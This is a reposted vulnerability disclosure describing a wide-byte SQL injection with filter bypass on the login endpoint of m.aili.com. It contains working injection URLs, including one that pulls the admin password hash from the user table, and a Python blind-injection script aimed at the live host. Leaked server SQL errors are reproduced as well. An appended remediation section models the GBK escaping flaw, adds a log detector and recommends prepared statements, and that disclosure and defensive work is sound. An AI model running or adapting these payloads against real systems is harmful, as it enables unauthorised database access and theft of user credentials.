Vulnerability title: Wide-byte SQL injection and filter bypass on an Aili site (verification script attached); the user database can be dumped
Vendor: aili.com
Author: BMa
Submitted: 2015-03-02 18:13
Published: 2015-04-16 18:14
Vulnerability type: SQL injection
Severity level:
Self-assessed Rank: 15
Status: vendor has confirmed
Tags:

Vulnerability details

m.aili.com/index.php?a=on_global_loginbk&c=wap&callback=jsonp1425083838041&chkcode=e&m=member&pwd=e1671797c52e15f763380b45e841ec32&username=%bf'

Parameter: username

Leaked user table and columns:

User table: dzxbbs_ucenter_members

User columns: uid,username,email,salt,password

So even though sqlmap cannot dump the data, the user database can still be dumped with a custom script.

[screenshot: 1.jpg]

Unfortunately sqlmap with tamper scripts could not dump anything; it could only confirm that the vulnerability exists:

[screenshot: 3.jpg]

[screenshot: 4.jpg]

The next step is to build a blind injection. Testing showed that the backend probably has filtering or some other protection, so the following statement was constructed to bypass it:

http://m.aili.com/index.php?a=on_global_loginbk&c=wap&callback=jsonp1425083838041&chkcode=e&m=member&pwd=e1671797c52e15f763380b45e841ec32&username=%bf%27%0a||%0a12=12%0a%23

True response:

[screenshot: 5.png]

False response:

[screenshot: 6.png]

Retrieving version:

[screenshot: 7.png]

Retrieving user:

[screenshot: 8.png]

Retrieving database:

[screenshot: 9.png]

Checking the number of users:

[screenshot: 10.png]

Some other information is leaked as well; database details (database name, tables, columns) can be obtained:

[screenshot: xinxi.png]

Code area
System Maintenance......
Please wait Try.Link-ID == false, connect failedSystem Maintenance......
Please wait Try.Link-ID == false, connect failedSystem Maintenance......
Please wait Try.cannot use database newcmsSystem Maintenance......
Please wait Try.cannot use database2 newcmsSystem Maintenance......
Please wait Try.Invalid SQL: SELECT * FROM channels WHERE iswap = 1 ORDER BY wapsort descSystem Maintenance......
Please wait Try.Invalid SQL: SELECT a.aid,a.type,a.title,a.stitle,a.ltitle,a.ftitle,a.channel,a.colu,a.tip,a.original,a.url,b.cover FROM (archives a inner JOIN `articles` b ON a.aid = b.aid) inner join columns c ON a.colu = c.cid WHERE a.tip!='' and a.posttime < 1425139200 and a.recycled=0 and a.type=0 and a.channel in(1,2,34,50,52,64,48) and a.status=2 and a.pbstatus=0 and b.cover!='' and c.isshow!=1 ORDER BY a.posttime DESC LIMIT 0, 12System Maintenance......
Please wait Try.Invalid SQL: SELECT a.aid,a.type,a.title,a.url,a.channel,a.colu,b.content,b.cover FROM (archives a inner JOIN `images` b ON a.aid = b.aid) inner join columns c ON a.colu = c.cid WHERE a.recycled=0 and a.posttime < 1425139200 and a.type=1 and a.status=2 and a.pbstatus=0 and a.channel in(1,2,34,50,52,64,48) and b.cover!='' and c.isshow!=1 ORDER BY a.posttime DESC LIMIT 0, 2System Maintenance......
Please wait Try.Invalid SQL: SELECT a.aid,a.type,a.title,a.url,a.channel,a.colu,b.cover FROM (archives a inner join `albums` b on a.aid=b.aid) inner join columns c ON a.colu = c.cid WHERE a.recycled=0 and a.posttime < 1425139200 and a.type=2 and a.status=2 and a.pbstatus=0 and a.channel in(1,2,34,50,52,64,48) and b.cover!='' and c.isshow!=1 ORDER BY a.posttime DESC LIMIT 0, 5System Maintenance......
Please wait Try.Invalid SQL: SELECT * FROM block WHERE pos = 'app_index_hd'


System Maintenance......
Please wait Try.Link-ID == false, connect failedSystem Maintenance......
Please wait Try.cannot use database newcms

A query for the admin user's password can also be constructed:

Code area
http://m.aili.com/index.php?a=on_global_loginbk&c=wap&callback=jsonp1425083838041&chkcode=e&m=member&pwd=e1671797c52e15f763380b45e841ec32&username=%bf%27%0a||%0aascii(mid(lower(SELECT%0apassword%0aFROM%0adzxbbs_ucenter_members%0aWHERE%0ausername%0a=%0a0x61646D696E),1,1))=3%0a%23

Proof of vulnerability:

Verification script attached:

Code area
#encoding=utf-8
import httplib
import sys
import random

headers = {}
#payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
# only digits are needed here: the injected query extracts a row count
payloads = list('0123456789')
print 'Start to retrieve MySQL database:'
user = ''
base_url = "/index.php?a=on_global_loginbk&m=member&" + \
    "c=wap&callback=jsonp1425083838041&chkcode=e&" + \
    "pwd=e1671797c52e15f763380b45e841ec32&username="
# one request per (character position, candidate digit) pair
for i in range(1,10):
    for payload in payloads:
        conn = httplib.HTTPConnection('m.aili.com', timeout=60)
        s = "%bf%27%0a||%0amid((select%0acount(*)%0afrom%0adzxbbs_ucenter_members),{0},1)={1}%0a%23".format(i,payload)
        conn.request(method='GET',
                     url = base_url + s,
                     headers=headers)
        html_doc = conn.getresponse().read().decode('utf-8')
        conn.close()
        # the word 'error' in the response marks the true branch
        if html_doc.find(u'error') > 0: # True
            user += payload
            sys.stdout.write('\r[In Progress]' + user + '\r')
            sys.stdout.flush()
            break
        else:
            print 'WAITING...' + str(random.randint(1,100))
print '\n[Done]MySQL ALL users are ' + user

Remediation:
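The report leaves the remediation section empty. The following is an added example, not code from the original report or from the aili.com code base, that models why the %bf%27 username value in the first request defeats addslashes()-style escaping on a GBK connection, shows a charset-aware escaper that closes the gap, and provides a request-log check for the pattern used in the bypass payload. The site's actual escaping routine and connection charset are not shown in the report; GBK and addslashes() are assumptions made here for the demonstration.

```python
"""Wide-byte injection: byte-level model, charset-aware fix and log check.
Added example; assumes a GBK connection and addslashes()-style escaping,
neither of which is confirmed by the report."""
from urllib.parse import unquote_to_bytes

SPECIALS = b"'\"\\\x00"


def addslashes(data: bytes) -> bytes:
    """Emulate PHP addslashes(): prefix ' " \\ and NUL with a backslash,
    byte by byte, with no knowledge of the connection charset."""
    out = bytearray()
    for b in data:
        if b in SPECIALS:
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def bare_quote_reaches_parser(escaped: bytes, charset: str) -> bool:
    """Decode the escaped bytes as the MySQL server would for the given
    connection charset and report whether an unescaped single quote remains.
    For GBK, 0xBF 0x5C is one valid double-byte character, so the backslash
    that addslashes() inserted is swallowed and the quote is freed."""
    text = escaped.decode(charset, errors="replace")
    i = 0
    while i < len(text):
        if text[i] == "\\":  # a backslash escapes the next character
            i += 2
            continue
        if text[i] == "'":
            return True
        i += 1
    return False


def escape_charset_aware(data: bytes, charset: str) -> bytes:
    """Escape at the character level in the connection charset (the same
    idea as mysql_real_escape_string with the charset set correctly), so a
    backslash can never become the trail byte of a multibyte character."""
    text = data.decode(charset, errors="replace")
    out = []
    for ch in text:
        if ch in "'\"\\\x00":
            out.append("\\")
        out.append(ch)
    return "".join(out).encode(charset, errors="replace")


def has_orphan_lead_byte_before_quote(raw: bytes) -> bool:
    """Walk the bytes with GBK structure: a lead byte (0x81-0xFE) followed by
    a valid trail byte (0x40-0x7E or 0x80-0xFE) is one character and is
    skipped; a lead byte followed directly by a quote is the wide-byte
    injection signature. Well-formed GBK text before a quote is not flagged."""
    i, n = 0, len(raw)
    while i < n:
        b = raw[i]
        if 0x81 <= b <= 0xFE:
            if i + 1 < n and (0x40 <= raw[i + 1] <= 0x7E or 0x80 <= raw[i + 1] <= 0xFE):
                i += 2
                continue
            if i + 1 < n and raw[i + 1] in b"'\"":
                return True
        i += 1
    return False


def flag_request(query_string: str) -> bool:
    """Percent-decode a raw query string (as seen in an access log) to bytes
    and apply the orphan-lead-byte check."""
    return has_orphan_lead_byte_before_quote(unquote_to_bytes(query_string))


if __name__ == "__main__":
    payload = unquote_to_bytes("%bf%27")  # the username value from the report
    print(bare_quote_reaches_parser(addslashes(payload), "gbk"))
    print(bare_quote_reaches_parser(escape_charset_aware(payload, "gbk"), "gbk"))
    # constructed log sample, modelled on the report's bypass request
    print(flag_request("username=%bf%27%0a||%0a12=12%0a%23"))
```

The first print is True (the quote survives), the second False. The durable fix is prepared statements with bound parameters, which never pass user bytes through the SQL lexer at all; the character-level escaper is the fallback when a legacy code path cannot be converted, and the log check is useful for finding past probing of the same endpoint.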

Copyright notice: please credit the source when reposting: BMa@乌云 (WooYun)

Please credit when reposting: 安全脉搏 » Wide-byte SQL injection and filter bypass on an Aili site (verification script attached); the user database can be dumped